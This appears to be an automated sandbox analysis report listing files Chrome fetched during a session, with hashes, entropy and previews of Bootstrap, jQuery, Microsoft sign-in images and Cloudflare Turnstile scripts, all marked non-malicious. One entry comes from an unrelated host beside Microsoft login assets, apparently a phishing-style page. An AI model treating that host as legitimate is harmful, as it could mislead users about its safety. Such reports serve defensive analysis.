                                                                                                                  SHA1:723FC544F30E1980A10743AB8955739A22A6E07B
                                                                                                                  SHA-256:45B65676814BEE78F75053BEB0ED34FDA56A054247B5805EE5E95ACA4CFCE709
                                                                                                                  SHA-512:95C2EAE8D4EFE8FAD21E2F54F13BD14D023E7B7E5F42300F63994E7B4D65BD7A5EDEC8D795D64561D3B3EC066F3ACFA46D701AB14B05DCC44A0BDCDBF5E22BFB
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js.map
                                                                                                                  Preview:{"version":3,"sources":["../../rollupPluginBabelHelpers","../../js/src/util.js","../../js/src/alert.js","../../js/src/button.js","../../js/src/carousel.js","../../js/src/collapse.js","../../js/src/dropdown.js","../../js/src/modal.js","../../js/src/tooltip.js","../../js/src/popover.js","../../js/src/scrollspy.js","../../js/src/tab.js","../../js/src/index.js"],"names":["_defineProperties","target","props","i","length","descriptor","enumerable","configurable","writable","Object","defineProperty","key","_createClass","Constructor","protoProps","staticProps","prototype","_extends","assign","arguments","source","hasOwnProperty","call","apply","this","$","NAME","DATA_KEY","EVENT_KEY","JQUERY_NO_CONFLICT","Event","ClassName","Alert","DATA_API_KEY","Selector","Button","Util","transition","transitionEndEmulator","duration","called","one","TRANSITION_END","triggerTransitionEnd","_this","prefix","Math","random","document","getElementById","element","selector","getAttribute","charAt","escapeSelecto
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):1864
                                                                                                                  Entropy (8bit):5.222032823730197
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                  MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                  SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                  SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                  SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (19015)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):19188
                                                                                                                  Entropy (8bit):5.212814407014048
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
                                                                                                                  MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                                                                  SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                                                                  SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                                                                  SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):18
                                                                                                                  Entropy (8bit):3.350209029099897
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:mweB:mweB
                                                                                                                  MD5:D5383BD6A3B20A253BA3ED676DB49373
                                                                                                                  SHA1:AADC39940FC284D5DAA1EECF74F942535BAB1552
                                                                                                                  SHA-256:772E32615A6574C3720FE0DC1A853B307D91D67A637F99B5F59B3C2D3FCD65B3
                                                                                                                  SHA-512:620C6A2E64D7C6094827492C6F5DEF5A06150E48496C0C32DADBED31B5D998AED5C38AE2C7850E59196F808FCABB581278E2361B242BD0CF5E76DB714BD2FB1E
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://cdnjs.cloudflare.com/favicon.ico
                                                                                                                  Preview:resource not found
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):621
                                                                                                                  Entropy (8bit):7.673946009263606
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                                                  MD5:4761405717E938D7E7400BB15715DB1E
                                                                                                                  SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                                                  SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                                                  SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (47531)
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):47532
                                                                                                                  Entropy (8bit):5.399631966931825
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:khCcfnNm52VJHkmnX7knsQMcvjdMdSzCTLos4P8X60Yo6VA3H1KCZ2EHCb+I29Na:kbNm8JHnnX7ksG7CT0K6V4P8
                                                                                                                  MD5:808A57CAE0B6FEE71F46EFDDED44B348
                                                                                                                  SHA1:DD570A24C8BDA1B391AA1DDEA6004125818E579A
                                                                                                                  SHA-256:5B75AC6F98994352699841DFFA6E562725EBBD0005C539946AD3625EC550EB0F
                                                                                                                  SHA-512:3F06DFBFDEDE9BB4270EB1BBBE29FFBDB6E19DC0AA8234E1A2B92D84F0737555031231965151EFC386510193343985BCEC63062484BBD8EC0540A94A0109B765
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://challenges.cloudflare.com/turnstile/v0/g/f2bbd6738e15/api.js
                                                                                                                  Preview:"use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var p=e[l](h),f=p.value}catch(s){n(s);return}p.done?r(f):Promise.resolve(f).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function h(f){Wt(l,o,c,h,p,"next",f)}function p(f){Wt(l,o,c,h,p,"throw",f)}h(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):176087
                                                                                                                  Entropy (8bit):5.285438318965507
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:YRoZvKxkIIcMoB+Uwl8sN7hexJ+B8uNPVsFGdMPDYsVfijbz7xLaS:JiuQvXa9W/gldMLfif9
                                                                                                                  MD5:2FC279B4CD4ACE33A72AA2AE05A83704
                                                                                                                  SHA1:0C489167CF0FA7D59EA27D3EC6F09099ED568159
                                                                                                                  SHA-256:A81B5014E5509A0044044F21BFF1E8EEE3CFB4D074E8387E827878B29397B46B
                                                                                                                  SHA-512:1AE360A198D71338223B296274BA5951617A5D044F0CDCF2C4585BF3E8134EE19C8DB45C2F3C04DABA85889925FD2CD1731B49889BFF094BEEB2B5289A24444E
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js.map
                                                                                                                  Preview:{"version":3,"sources":["../../js/src/util.js","../../js/src/alert.js","../../js/src/button.js","../../js/src/carousel.js","../../js/src/collapse.js","../../js/src/dropdown.js","../../js/src/modal.js","../../js/src/tooltip.js","../../js/src/popover.js","../../js/src/scrollspy.js","../../js/src/tab.js","../../js/src/index.js"],"names":["$","NAME","DATA_KEY","EVENT_KEY","JQUERY_NO_CONFLICT","Event","ClassName","Alert","DATA_API_KEY","Selector","Button","Default","DefaultType","Direction","Carousel","Dimension","Collapse","REGEXP_KEYDOWN","AttachmentMap","Dropdown","Modal","CLASS_PREFIX","BSCLS_PREFIX_REGEX","HoverState","Trigger","Tooltip","Popover","OffsetMethod","ScrollSpy","Tab","Util","TRANSITION_END","transitionEndEmulator","duration","_this","this","called","one","setTimeout","triggerTransitionEnd","getUID","prefix","Math","random","document","getElementById","getSelectorFromElement","element","selector","getAttribute","querySelector","err","getTransitionDurationFromElement","trans
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:PNG image data, 2 x 69, 8-bit/color RGB, non-interlaced
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):61
                                                                                                                  Entropy (8bit):3.969798475032602
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:yionv//thPltOdmshkxl/k4E08up:6v/lhP2dFk7Tp
                                                                                                                  MD5:F2C2E5EE85A8FDF3C45A6F037BD855D7
                                                                                                                  SHA1:88B27332F5F4539C148ECED81040B72E5BDC3A74
                                                                                                                  SHA-256:86952B5EDB7DD57577B9D745296148AFD076665E8BE6F05BF2C2BE8CAE8F08E3
                                                                                                                  SHA-512:23ED9F48734EE5939A549DD34C521CE4EF8B74C47A6DFF5AE20ECADE250499568896C6E6101EDD3D3C19E2CD2F92481186CBB54086E31CAFE73A5E2A672C854C
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8d6a0f0a98ece91e/1729606102483/7co4aaUL0qHQce5
                                                                                                                  Preview:.PNG........IHDR.......E...........IDAT.....$.....IEND.B`.
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (48664)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):48944
                                                                                                                  Entropy (8bit):5.272507874206726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
                                                                                                                  MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                                                                  SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                                                                  SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                                                                  SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):621
                                                                                                                  Entropy (8bit):7.673946009263606
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                                                  MD5:4761405717E938D7E7400BB15715DB1E
                                                                                                                  SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                                                  SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                                                  SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg
                                                                                                                  Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (32065)
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):85578
                                                                                                                  Entropy (8bit):5.366055229017455
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                                                                                  MD5:2F6B11A7E914718E0290410E85366FE9
                                                                                                                  SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                                                                  SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                                                                  SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                                                                                  Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):61
                                                                                                                  Entropy (8bit):3.990210155325004
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):61
                                                                                                                  Entropy (8bit):3.990210155325004
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                                                                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):196
                                                                                                                  Entropy (8bit):5.098952451791238
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezocKqD:J0+oxBeRmR9etdzRxGez1T
                                                                                                                  MD5:62962DAA1B19BBCC2DB10B7BFD531EA6
                                                                                                                  SHA1:D64BAE91091EDA6A7532EBEC06AA70893B79E1F8
                                                                                                                  SHA-256:80C3FE2AE1062ABF56456F52518BD670F9EC3917B7F85E152B347AC6B6FAF880
                                                                                                                  SHA-512:9002A0475FDB38541E78048709006926655C726E93E823B84E2DBF5B53FD539A5342E7266447D23DB0E5528E27A19961B115B180C94F2272FF124C7E5C8304E7
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://apeidieppe-d.basiic.net/yKKWd/bootstrap.min.css.map
                                                                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.</body></html>.
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (50758)
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):51039
                                                                                                                  Entropy (8bit):5.247253437401007
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                                                                                  MD5:67176C242E1BDC20603C878DEE836DF3
                                                                                                                  SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                                                                  SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                                                                  SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                                                                                  Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (32012)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):69597
                                                                                                                  Entropy (8bit):5.369216080582935
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                                                                                                                  MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                                                                  SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                                                                  SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                                                                  SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):17174
                                                                                                                  Entropy (8bit):2.9129715116732746
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                  MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                  SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                  SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                  SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
